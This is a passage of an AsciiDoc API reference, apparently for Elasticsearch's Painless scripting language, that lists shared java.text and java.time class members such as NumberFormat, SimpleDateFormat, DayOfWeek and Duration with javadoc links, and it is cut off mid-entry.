{java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setPatternSeparator(char)[setPatternSeparator](char) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setPerMill(char)[setPerMill](char) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setPercent(char)[setPercent](char) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setZeroDigit(char)[setZeroDigit](char) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-FieldPosition]] -==== FieldPosition -* {java11-javadoc}/java.base/java/text/FieldPosition.html#(int)[FieldPosition](int) -* {java11-javadoc}/java.base/java/text/FieldPosition.html#(java.text.Format$Field,int)[FieldPosition](Format.Field, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/text/FieldPosition.html#getBeginIndex()[getBeginIndex]() -* int {java11-javadoc}/java.base/java/text/FieldPosition.html#getEndIndex()[getEndIndex]() -* int {java11-javadoc}/java.base/java/text/FieldPosition.html#getField()[getField]() -* Format.Field {java11-javadoc}/java.base/java/text/FieldPosition.html#getFieldAttribute()[getFieldAttribute]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/text/FieldPosition.html#setBeginIndex(int)[setBeginIndex](int) -* void {java11-javadoc}/java.base/java/text/FieldPosition.html#setEndIndex(int)[setEndIndex](int) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Format]] -==== Format -* def {java11-javadoc}/java.base/java/text/Format.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object)[format](Object) -* StringBuffer {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object,java.lang.StringBuffer,java.text.FieldPosition)[format](Object, StringBuffer, FieldPosition) -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/Format.html#formatToCharacterIterator(java.lang.Object)[formatToCharacterIterator](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String)[parseObject](null) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String,java.text.ParsePosition)[parseObject](null, ParsePosition) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Format-Field]] -==== Format.Field -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-MessageFormat]] -==== MessageFormat -* static null {java11-javadoc}/java.base/java/text/MessageFormat.html#format(java.lang.String,java.lang.Object%5B%5D)[format](null, Object[]) -* void {java11-javadoc}/java.base/java/text/MessageFormat.html#applyPattern(java.lang.String)[applyPattern](null) -* def {java11-javadoc}/java.base/java/text/Format.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object)[format](Object) -* StringBuffer {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object,java.lang.StringBuffer,java.text.FieldPosition)[format](Object, StringBuffer, FieldPosition) -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/Format.html#formatToCharacterIterator(java.lang.Object)[formatToCharacterIterator](Object) -* Format[] {java11-javadoc}/java.base/java/text/MessageFormat.html#getFormats()[getFormats]() -* Format[] {java11-javadoc}/java.base/java/text/MessageFormat.html#getFormatsByArgumentIndex()[getFormatsByArgumentIndex]() -* Locale {java11-javadoc}/java.base/java/text/MessageFormat.html#getLocale()[getLocale]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Object[] {java11-javadoc}/java.base/java/text/MessageFormat.html#parse(java.lang.String)[parse](null) -* Object[] {java11-javadoc}/java.base/java/text/MessageFormat.html#parse(java.lang.String,java.text.ParsePosition)[parse](null, ParsePosition) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String)[parseObject](null) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String,java.text.ParsePosition)[parseObject](null, ParsePosition) -* void {java11-javadoc}/java.base/java/text/MessageFormat.html#setFormat(int,java.text.Format)[setFormat](int, Format) -* void {java11-javadoc}/java.base/java/text/MessageFormat.html#setFormatByArgumentIndex(int,java.text.Format)[setFormatByArgumentIndex](int, Format) -* void {java11-javadoc}/java.base/java/text/MessageFormat.html#setFormats(java.text.Format%5B%5D)[setFormats](Format[]) -* void {java11-javadoc}/java.base/java/text/MessageFormat.html#setFormatsByArgumentIndex(java.text.Format%5B%5D)[setFormatsByArgumentIndex](Format[]) -* void {java11-javadoc}/java.base/java/text/MessageFormat.html#setLocale(java.util.Locale)[setLocale](Locale) -* null {java11-javadoc}/java.base/java/text/MessageFormat.html#toPattern()[toPattern]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-MessageFormat-Field]] -==== MessageFormat.Field -* static MessageFormat.Field {java11-javadoc}/java.base/java/text/MessageFormat$Field.html#ARGUMENT[ARGUMENT] -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Normalizer]] -==== Normalizer -* static boolean {java11-javadoc}/java.base/java/text/Normalizer.html#isNormalized(java.lang.CharSequence,java.text.Normalizer$Form)[isNormalized](CharSequence, Normalizer.Form) -* static null {java11-javadoc}/java.base/java/text/Normalizer.html#normalize(java.lang.CharSequence,java.text.Normalizer$Form)[normalize](CharSequence, Normalizer.Form) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Normalizer-Form]] -==== Normalizer.Form -* static Normalizer.Form {java11-javadoc}/java.base/java/text/Normalizer$Form.html#NFC[NFC] -* static Normalizer.Form {java11-javadoc}/java.base/java/text/Normalizer$Form.html#NFD[NFD] -* static Normalizer.Form {java11-javadoc}/java.base/java/text/Normalizer$Form.html#NFKC[NFKC] -* static Normalizer.Form {java11-javadoc}/java.base/java/text/Normalizer$Form.html#NFKD[NFKD] -* static Normalizer.Form {java11-javadoc}/java.base/java/text/Normalizer$Form.html#valueOf(java.lang.String)[valueOf](null) -* static Normalizer.Form[] {java11-javadoc}/java.base/java/text/Normalizer$Form.html#values()[values]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-NumberFormat]] -==== NumberFormat -* static int {java11-javadoc}/java.base/java/text/NumberFormat.html#FRACTION_FIELD[FRACTION_FIELD] -* static int {java11-javadoc}/java.base/java/text/NumberFormat.html#INTEGER_FIELD[INTEGER_FIELD] -* static Locale[] {java11-javadoc}/java.base/java/text/NumberFormat.html#getAvailableLocales()[getAvailableLocales]() -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getCurrencyInstance()[getCurrencyInstance]() -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getCurrencyInstance(java.util.Locale)[getCurrencyInstance](Locale) -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getInstance()[getInstance]() -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getInstance(java.util.Locale)[getInstance](Locale) -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getIntegerInstance()[getIntegerInstance]() -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getIntegerInstance(java.util.Locale)[getIntegerInstance](Locale) -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getNumberInstance()[getNumberInstance]() -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getNumberInstance(java.util.Locale)[getNumberInstance](Locale) -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getPercentInstance()[getPercentInstance]() -* static NumberFormat {java11-javadoc}/java.base/java/text/NumberFormat.html#getPercentInstance(java.util.Locale)[getPercentInstance](Locale) -* def {java11-javadoc}/java.base/java/text/Format.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object)[format](Object) -* StringBuffer {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object,java.lang.StringBuffer,java.text.FieldPosition)[format](Object, StringBuffer, FieldPosition) -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/Format.html#formatToCharacterIterator(java.lang.Object)[formatToCharacterIterator](Object) -* Currency {java11-javadoc}/java.base/java/text/NumberFormat.html#getCurrency()[getCurrency]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMaximumFractionDigits()[getMaximumFractionDigits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMaximumIntegerDigits()[getMaximumIntegerDigits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMinimumFractionDigits()[getMinimumFractionDigits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMinimumIntegerDigits()[getMinimumIntegerDigits]() -* RoundingMode {java11-javadoc}/java.base/java/text/NumberFormat.html#getRoundingMode()[getRoundingMode]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/text/NumberFormat.html#isGroupingUsed()[isGroupingUsed]() -* boolean {java11-javadoc}/java.base/java/text/NumberFormat.html#isParseIntegerOnly()[isParseIntegerOnly]() -* Number {java11-javadoc}/java.base/java/text/NumberFormat.html#parse(java.lang.String)[parse](null) -* Number {java11-javadoc}/java.base/java/text/NumberFormat.html#parse(java.lang.String,java.text.ParsePosition)[parse](null, ParsePosition) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String)[parseObject](null) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String,java.text.ParsePosition)[parseObject](null, ParsePosition) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setCurrency(java.util.Currency)[setCurrency](Currency) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setGroupingUsed(boolean)[setGroupingUsed](boolean) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMaximumFractionDigits(int)[setMaximumFractionDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMaximumIntegerDigits(int)[setMaximumIntegerDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMinimumFractionDigits(int)[setMinimumFractionDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMinimumIntegerDigits(int)[setMinimumIntegerDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setParseIntegerOnly(boolean)[setParseIntegerOnly](boolean) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setRoundingMode(java.math.RoundingMode)[setRoundingMode](RoundingMode) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-NumberFormat-Field]] -==== NumberFormat.Field -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#CURRENCY[CURRENCY] -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#DECIMAL_SEPARATOR[DECIMAL_SEPARATOR] -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#EXPONENT[EXPONENT] -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#EXPONENT_SIGN[EXPONENT_SIGN] -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#EXPONENT_SYMBOL[EXPONENT_SYMBOL] -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#FRACTION[FRACTION] -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#GROUPING_SEPARATOR[GROUPING_SEPARATOR] -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#INTEGER[INTEGER] -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#PERCENT[PERCENT] -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#PERMILLE[PERMILLE] -* static NumberFormat.Field {java11-javadoc}/java.base/java/text/NumberFormat$Field.html#SIGN[SIGN] -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ParseException]] -==== ParseException -* {java11-javadoc}/java.base/java/text/ParseException.html#(java.lang.String,int)[ParseException](null, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/text/ParseException.html#getErrorOffset()[getErrorOffset]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ParsePosition]] -==== ParsePosition -* {java11-javadoc}/java.base/java/text/ParsePosition.html#(int)[ParsePosition](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/text/ParsePosition.html#getErrorIndex()[getErrorIndex]() -* int {java11-javadoc}/java.base/java/text/ParsePosition.html#getIndex()[getIndex]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/text/ParsePosition.html#setErrorIndex(int)[setErrorIndex](int) -* void {java11-javadoc}/java.base/java/text/ParsePosition.html#setIndex(int)[setIndex](int) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-RuleBasedCollator]] -==== RuleBasedCollator -* {java11-javadoc}/java.base/java/text/RuleBasedCollator.html#(java.lang.String)[RuleBasedCollator](null) -* def {java11-javadoc}/java.base/java/text/Collator.html#clone()[clone]() -* int {java11-javadoc}/java.base/java/util/Comparator.html#compare(java.lang.Object,java.lang.Object)[compare](def, def) -* boolean {java11-javadoc}/java.base/java/util/Comparator.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/text/Collator.html#equals(java.lang.String,java.lang.String)[equals](null, null) -* CollationElementIterator {java11-javadoc}/java.base/java/text/RuleBasedCollator.html#getCollationElementIterator(java.lang.String)[getCollationElementIterator](null) -* CollationKey {java11-javadoc}/java.base/java/text/Collator.html#getCollationKey(java.lang.String)[getCollationKey](null) -* int {java11-javadoc}/java.base/java/text/Collator.html#getDecomposition()[getDecomposition]() -* null {java11-javadoc}/java.base/java/text/RuleBasedCollator.html#getRules()[getRules]() -* int {java11-javadoc}/java.base/java/text/Collator.html#getStrength()[getStrength]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#reversed()[reversed]() -* void {java11-javadoc}/java.base/java/text/Collator.html#setDecomposition(int)[setDecomposition](int) -* void {java11-javadoc}/java.base/java/text/Collator.html#setStrength(int)[setStrength](int) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparing(java.util.Comparator)[thenComparing](Comparator) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparing(java.util.function.Function,java.util.Comparator)[thenComparing](Function, Comparator) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparingDouble(java.util.function.ToDoubleFunction)[thenComparingDouble](ToDoubleFunction) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparingInt(java.util.function.ToIntFunction)[thenComparingInt](ToIntFunction) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparingLong(java.util.function.ToLongFunction)[thenComparingLong](ToLongFunction) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-SimpleDateFormat]] -==== SimpleDateFormat -* {java11-javadoc}/java.base/java/text/SimpleDateFormat.html#()[SimpleDateFormat]() -* {java11-javadoc}/java.base/java/text/SimpleDateFormat.html#(java.lang.String)[SimpleDateFormat](null) -* {java11-javadoc}/java.base/java/text/SimpleDateFormat.html#(java.lang.String,java.util.Locale)[SimpleDateFormat](null, Locale) -* void {java11-javadoc}/java.base/java/text/SimpleDateFormat.html#applyLocalizedPattern(java.lang.String)[applyLocalizedPattern](null) -* void {java11-javadoc}/java.base/java/text/SimpleDateFormat.html#applyPattern(java.lang.String)[applyPattern](null) -* def {java11-javadoc}/java.base/java/text/Format.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object)[format](Object) -* StringBuffer {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object,java.lang.StringBuffer,java.text.FieldPosition)[format](Object, StringBuffer, FieldPosition) -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/Format.html#formatToCharacterIterator(java.lang.Object)[formatToCharacterIterator](Object) -* Date {java11-javadoc}/java.base/java/text/SimpleDateFormat.html#get2DigitYearStart()[get2DigitYearStart]() -* Calendar {java11-javadoc}/java.base/java/text/DateFormat.html#getCalendar()[getCalendar]() -* DateFormatSymbols {java11-javadoc}/java.base/java/text/SimpleDateFormat.html#getDateFormatSymbols()[getDateFormatSymbols]() -* NumberFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getNumberFormat()[getNumberFormat]() -* TimeZone {java11-javadoc}/java.base/java/text/DateFormat.html#getTimeZone()[getTimeZone]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/text/DateFormat.html#isLenient()[isLenient]() -* Date {java11-javadoc}/java.base/java/text/DateFormat.html#parse(java.lang.String)[parse](null) -* Date {java11-javadoc}/java.base/java/text/DateFormat.html#parse(java.lang.String,java.text.ParsePosition)[parse](null, ParsePosition) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String)[parseObject](null) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String,java.text.ParsePosition)[parseObject](null, ParsePosition) -* void {java11-javadoc}/java.base/java/text/SimpleDateFormat.html#set2DigitYearStart(java.util.Date)[set2DigitYearStart](Date) -* void {java11-javadoc}/java.base/java/text/DateFormat.html#setCalendar(java.util.Calendar)[setCalendar](Calendar) -* void {java11-javadoc}/java.base/java/text/SimpleDateFormat.html#setDateFormatSymbols(java.text.DateFormatSymbols)[setDateFormatSymbols](DateFormatSymbols) -* void {java11-javadoc}/java.base/java/text/DateFormat.html#setLenient(boolean)[setLenient](boolean) -* void {java11-javadoc}/java.base/java/text/DateFormat.html#setNumberFormat(java.text.NumberFormat)[setNumberFormat](NumberFormat) -* void {java11-javadoc}/java.base/java/text/DateFormat.html#setTimeZone(java.util.TimeZone)[setTimeZone](TimeZone) -* null {java11-javadoc}/java.base/java/text/SimpleDateFormat.html#toLocalizedPattern()[toLocalizedPattern]() -* null {java11-javadoc}/java.base/java/text/SimpleDateFormat.html#toPattern()[toPattern]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-StringCharacterIterator]] -==== StringCharacterIterator -* {java11-javadoc}/java.base/java/text/StringCharacterIterator.html#(java.lang.String)[StringCharacterIterator](null) -* {java11-javadoc}/java.base/java/text/StringCharacterIterator.html#(java.lang.String,int)[StringCharacterIterator](null, int) -* {java11-javadoc}/java.base/java/text/StringCharacterIterator.html#(java.lang.String,int,int,int)[StringCharacterIterator](null, int, int, int) -* def {java11-javadoc}/java.base/java/text/CharacterIterator.html#clone()[clone]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#current()[current]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#first()[first]() -* int {java11-javadoc}/java.base/java/text/CharacterIterator.html#getBeginIndex()[getBeginIndex]() -* int {java11-javadoc}/java.base/java/text/CharacterIterator.html#getEndIndex()[getEndIndex]() -* int {java11-javadoc}/java.base/java/text/CharacterIterator.html#getIndex()[getIndex]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#last()[last]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#next()[next]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#previous()[previous]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#setIndex(int)[setIndex](int) -* void {java11-javadoc}/java.base/java/text/StringCharacterIterator.html#setText(java.lang.String)[setText](null) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-java-time"] -=== Shared API for package java.time -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-Clock]] -==== Clock -* static Clock {java11-javadoc}/java.base/java/time/Clock.html#fixed(java.time.Instant,java.time.ZoneId)[fixed](Instant, ZoneId) -* static Clock {java11-javadoc}/java.base/java/time/Clock.html#offset(java.time.Clock,java.time.Duration)[offset](Clock, Duration) -* static Clock {java11-javadoc}/java.base/java/time/Clock.html#tick(java.time.Clock,java.time.Duration)[tick](Clock, Duration) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* ZoneId {java11-javadoc}/java.base/java/time/Clock.html#getZone()[getZone]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Instant {java11-javadoc}/java.base/java/time/Clock.html#instant()[instant]() -* long {java11-javadoc}/java.base/java/time/Clock.html#millis()[millis]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DateTimeException]] -==== DateTimeException -* {java11-javadoc}/java.base/java/time/DateTimeException.html#(java.lang.String)[DateTimeException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DayOfWeek]] -==== DayOfWeek -* static DayOfWeek {java11-javadoc}/java.base/java/time/DayOfWeek.html#FRIDAY[FRIDAY] -* static DayOfWeek {java11-javadoc}/java.base/java/time/DayOfWeek.html#MONDAY[MONDAY] -* static DayOfWeek {java11-javadoc}/java.base/java/time/DayOfWeek.html#SATURDAY[SATURDAY] -* static DayOfWeek {java11-javadoc}/java.base/java/time/DayOfWeek.html#SUNDAY[SUNDAY] -* static DayOfWeek {java11-javadoc}/java.base/java/time/DayOfWeek.html#THURSDAY[THURSDAY] -* static DayOfWeek {java11-javadoc}/java.base/java/time/DayOfWeek.html#TUESDAY[TUESDAY] -* static DayOfWeek {java11-javadoc}/java.base/java/time/DayOfWeek.html#WEDNESDAY[WEDNESDAY] -* static DayOfWeek {java11-javadoc}/java.base/java/time/DayOfWeek.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static DayOfWeek {java11-javadoc}/java.base/java/time/DayOfWeek.html#of(int)[of](int) -* static DayOfWeek {java11-javadoc}/java.base/java/time/DayOfWeek.html#valueOf(java.lang.String)[valueOf](null) -* static DayOfWeek[] {java11-javadoc}/java.base/java/time/DayOfWeek.html#values()[values]() -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* null {java11-javadoc}/java.base/java/time/DayOfWeek.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/DayOfWeek.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* DayOfWeek {java11-javadoc}/java.base/java/time/DayOfWeek.html#minus(long)[minus](long) -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* DayOfWeek {java11-javadoc}/java.base/java/time/DayOfWeek.html#plus(long)[plus](long) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Duration]] -==== Duration -* static Duration {java11-javadoc}/java.base/java/time/Duration.html#ZERO[ZERO] -* static Duration {java11-javadoc}/java.base/java/time/Duration.html#between(java.time.temporal.Temporal,java.time.temporal.Temporal)[between](Temporal, Temporal) -* static Duration {java11-javadoc}/java.base/java/time/Duration.html#from(java.time.temporal.TemporalAmount)[from](TemporalAmount) -* static Duration {java11-javadoc}/java.base/java/time/Duration.html#of(long,java.time.temporal.TemporalUnit)[of](long, TemporalUnit) -* static Duration {java11-javadoc}/java.base/java/time/Duration.html#ofDays(long)[ofDays](long) -* static Duration {java11-javadoc}/java.base/java/time/Duration.html#ofHours(long)[ofHours](long) -* static Duration {java11-javadoc}/java.base/java/time/Duration.html#ofMillis(long)[ofMillis](long) -* static Duration {java11-javadoc}/java.base/java/time/Duration.html#ofMinutes(long)[ofMinutes](long) -* static Duration {java11-javadoc}/java.base/java/time/Duration.html#ofNanos(long)[ofNanos](long) -* static Duration {java11-javadoc}/java.base/java/time/Duration.html#ofSeconds(long)[ofSeconds](long) -* static Duration {java11-javadoc}/java.base/java/time/Duration.html#ofSeconds(long,long)[ofSeconds](long, long) -* static Duration {java11-javadoc}/java.base/java/time/Duration.html#parse(java.lang.CharSequence)[parse](CharSequence) -* Duration {java11-javadoc}/java.base/java/time/Duration.html#abs()[abs]() -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAmount.html#addTo(java.time.temporal.Temporal)[addTo](Temporal) -* int {java11-javadoc}/java.base/java/time/Duration.html#compareTo(java.time.Duration)[compareTo](Duration) -* Duration {java11-javadoc}/java.base/java/time/Duration.html#dividedBy(long)[dividedBy](long) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAmount.html#get(java.time.temporal.TemporalUnit)[get](TemporalUnit) -* int {java11-javadoc}/java.base/java/time/Duration.html#getNano()[getNano]() -* long {java11-javadoc}/java.base/java/time/Duration.html#getSeconds()[getSeconds]() -* List {java11-javadoc}/java.base/java/time/temporal/TemporalAmount.html#getUnits()[getUnits]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/Duration.html#isNegative()[isNegative]() -* boolean {java11-javadoc}/java.base/java/time/Duration.html#isZero()[isZero]() -* Duration {java11-javadoc}/java.base/java/time/Duration.html#minus(java.time.Duration)[minus](Duration) -* Duration {java11-javadoc}/java.base/java/time/Duration.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* Duration {java11-javadoc}/java.base/java/time/Duration.html#minusDays(long)[minusDays](long) -* Duration {java11-javadoc}/java.base/java/time/Duration.html#minusHours(long)[minusHours](long) -* Duration {java11-javadoc}/java.base/java/time/Duration.html#minusMillis(long)[minusMillis](long) -* Duration 